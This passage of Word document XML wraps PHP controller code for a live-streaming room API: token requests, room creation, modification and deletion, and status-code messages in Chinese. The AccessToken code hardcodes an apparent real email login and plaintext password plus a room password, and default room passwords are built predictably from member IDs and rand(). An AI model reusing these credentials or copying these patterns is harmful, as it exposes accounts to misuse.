    </w:p>
    <w:p w14:paraId="57EBA94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if($recording){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA0F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$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4E4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C8F46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json_encode($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F32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38E48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447A8CD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C7A26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52D0C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echo json_encode(['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4793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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF6B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619A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$this-&gt;member=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204111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3AD9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post($url, $post_data,$token=null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC863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if($token){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B004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$options = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA63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 =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8F7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'method' =&gt; 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2B3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 =&gt; ['Content-type:application/json','Authorization:'.$token],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294ED7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json_encode($post_data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BADC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'timeout' =&gt; 15 * 60 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB17C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2F27F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C24A3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4945A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$options = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5060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'http' =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68892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'method' =&gt; 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70951A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'header' =&gt; 'Content-type:application/json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232AD7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json_encode($post_data),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C85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'timeout' =&gt; 15 * 60 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F112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56035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6F28B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1E294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$context = stream_context_create($options);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5668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file_get_contents($this-&gt;url.$url, false, $context);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A041A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json_decode($result,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A758D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CCD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AccessToken(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD3A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 "1424445608@qq.com";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223948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"waini12";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB14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$post_data = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604504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"scope"         =&gt; "app",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4BD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"username"      =&gt;  $username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468333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=&gt;  $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326331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25C62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$this-&gt;post('AccessToken', $post_data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3174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$result['accessToken'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48C7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$roomId = "22001331";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1000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 "p1cU2G";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0013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$post_data = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBD3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"scope"=&gt; "room",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A8F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"roomId"    =&gt;  $roomId, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102850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"password"  =&gt;  $password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B145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"secretKey" =&gt;  md5($roomId.$password.$this-&gt;accessSecret), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC72E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"nickName"  =&gt;  "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70605D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"account"   =&gt;  "" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF070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2694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$result = $this-&gt;post('AccessToken', $post_data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CC66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dump($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C449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A5750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GetRooms($a=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3F2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7C609C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!empty($a['type'])  ? $a['type']  : 0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F9C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"index" =&gt; !empty($a['type']) ? $a['index'] : 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4A3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"count" =&gt; !empty($a['type']) ? $a['count'] : 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F40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10C6CF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array_merge($data,$a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE32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$this-&gt;post('GetRooms',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA902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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D601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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11C0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1608DF4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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A1E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B1A42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6A75A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CreateRoom($post=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643104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Db::name('member_zhibo')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478590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6A09BE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 = input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D01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54D503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json_encode(['err'=&gt;'data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','msg'=&gt;'data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF023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99CBDE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4D2D76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$add['roomId']      =   $db['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643429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$add['roomName']    =   $post['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40275F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$add['type_id']     =   $post['type_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AE3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$add['img_l']       =   $post['img_l'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277123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$add['img_r']       =   $post['img_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0200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$list = json_decode($this-&gt;ModifyRoom($add),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E57C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if(!empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4BD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json(['ret'=&gt;$db]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F30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DA5FD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json(['msg'=&gt;$list]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE56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7E29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json_encode(['ret'=&gt;$list]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D79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8014E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283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3C45B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EFA4E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户直播已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','msg'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户直播已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CA9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C297A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6E42DB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Validate(['roomName' =&gt; 'require|max:100|length:3,100', 'type_id' =&gt; 'number|require', 'img_l' =&gt; 'require','img_r' =&gt; 'require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB0A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(!$validate-&gt;check($post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750928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 =&gt; $validate-&gt;getError() ]));;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7580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5C2D5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$data['roomName']   =   $post['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96AD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$data['anchorPwd']  =   !empty($post['anchorPwd'])  ? $post['anchorPwd']    : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B33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$data['assistPwd']  =   !empty($post['assistPwd'])  ? $post['assistPwd']    : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833AB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$data['userPwd']    =   !empty($post['userPwd'])    ? $post['userPwd']      : $this-&gt;member['id'].rand(100000,9999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140BB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$data['creator']    =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E1B3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$data['maxOnlineNum']=  0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A180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$data['anchorDesc'] =   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732E2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$data['contentDesc']=   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BB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$data['thirdRoomId']=   '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9608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$type_1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($post['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE84D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$type_2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_1['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD34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$data['firstIndustry']=     $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC744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$data['secondIndustry']=    $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DEF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$this-&gt;post('CreateRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753718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5DADD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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032B9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$res['entity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511AF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$add['roomName']        =   $res['roomName'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283B5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$add['anchorPwd']       =   $res['anchorPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8AA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$add['assistPwd']       =   $res['assistPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3015C1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$add['userPwd']         =   $res['userPwd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB764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$add['anchorDesc']      =   $res['anchorDesc'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D3C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$add['contentDesc']     =   $res['contentDesc'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24E3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$add['creator']         =   $res['creator'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C99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$add['maxOnlineNum']    =   $res['maxOnlineNum'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320407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$add['firstIndustry']   =   $res['firstIndustry'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA5A7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$add['secondIndustry']  =   $res['secondIndustry'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128BD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$add['roomId']          =   $res['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F859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$add['create_time']     =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8733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$add['update_time']     =   $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E280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$add['img_l']           =   $post['img_l'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D3C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$add['img_r']           =   $post['img_r'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B465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$add['uid']             =   $this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196D3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$add['type_id']         =   $post['type_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229ED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$add['des']             =   50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A2E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Db::name('member_zhibo')-&gt;insert($add);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636624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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D4C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D93115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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C18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103C3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87B6C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typename(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B0D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$data = Db::name('member_zhibo_type')-&gt;where('tid',0)-&gt;order('des desc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17BD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22CF83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$data[$k]['data'] = Db::name('member_zhibo_type')-&gt;where('tid',$v['id'])-&gt;order('des desc')-&gt;cache(true)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC03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197C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json_encode($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D098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17040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DelRoom($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61B0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10B2CB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'roomId' =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B83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E6A5D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$this-&gt;post('DelRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190ED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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF091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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11DD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77641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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBDE7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65807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A1324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GetRoomsLiveInfo($ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C39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1C237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'roomIds' =&gt; $ids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB3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2BD84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$this-&gt;post('GetRoomsLiveInfo',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B910C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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36948B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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF4C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4EF76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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A01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5708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997F7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GetClientUrls($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FB4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537AB52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'roomId' =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25848A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8D4BC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$this-&gt;post('GetClientUrls',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DB0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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA74B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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660937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0A9F87E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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E14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3E361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53207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GetRoom($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6944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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30837E9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'roomId' =&gt; $id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B67E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7EED4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$this-&gt;post('GetRoom',$data,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A1C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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15347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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AE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7FE079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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A07A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4933F7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7FF6BF3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ModifyRoom($post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3813E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DF3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json_encode(['err'=&gt;'data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B5F0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C882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if(!$post['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E508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json_encode(['err'=&gt;'roomId</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>房间号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7440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D6B4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$validate = new Validate(['roomName' =&gt; 'require|max:100|length:3,100', 'type_id' =&gt; 'number|require', 'img_l' =&gt; 'require','img_r' =&gt; 'require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD02A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 (!$validate-&gt;check($post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF7E6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exit(json_encode(['err' =&gt; $validate-&gt;getError() ]));;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D219A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B2DFC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$type_1 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($post['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4BBB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$type_2 = Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($type_1['tid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51D8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$post['firstIndustry']=     $type_2['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F416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$post['secondIndustry']=    $type_1['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AA9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$res = $this-&gt;post('ModifyRoom',$post,$this-&gt;AccessToken());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67158A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 = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A21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if($res['status'] == '200'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286230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$post['update_time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E075F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 = Db::name('member_zhibo')-&gt;where(['roomId'=&gt;$post['roomId'],'uid'=&gt;$this-&gt;member['id']])-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B33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if(!$a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CC8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json_encode(['err'=&gt;$res,'msg'=&gt;'member_zhibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表修改数据失败，用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID'.$this-&gt;member['uid']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF62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10075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json_encode(['ret'=&gt;$res]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1B6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5BEA46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json_encode(['err'=&gt;$res,'msg'=&gt;$this-&gt;msg($res['status'])]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B25BE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67DBB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933D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info(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A96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Db::name('member_zhibo')-&gt;where(['uid'=&gt;$this-&gt;member['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CD13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094233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Db::name('member_zhibo_type')-&gt;cache(true)-&gt;find($db['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1B7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BBC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$db['type_title'] = $type['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88BA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E649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json(['ret'=&gt;$db]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04813AD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CBC32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p>
    <w:p w14:paraId="0AF8F8F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C7324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529C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private function msg($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441EF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p>
    <w:p w14:paraId="0087A2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($id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6408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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98DE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调用成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A00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5E3ECE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case 401:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9274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认证失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无效的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B4E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4888D36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417:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423AE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接口超过每天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>room</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大访问次数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA3D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603E23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419:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4EF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接口超过每天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最大访问次数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD08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373A6D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420:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789E6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没有权限访问此资源</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A4C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6908AE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1001:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FCF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无效的录播</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A3E8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24BC93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1003:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170E8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无效的录播时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
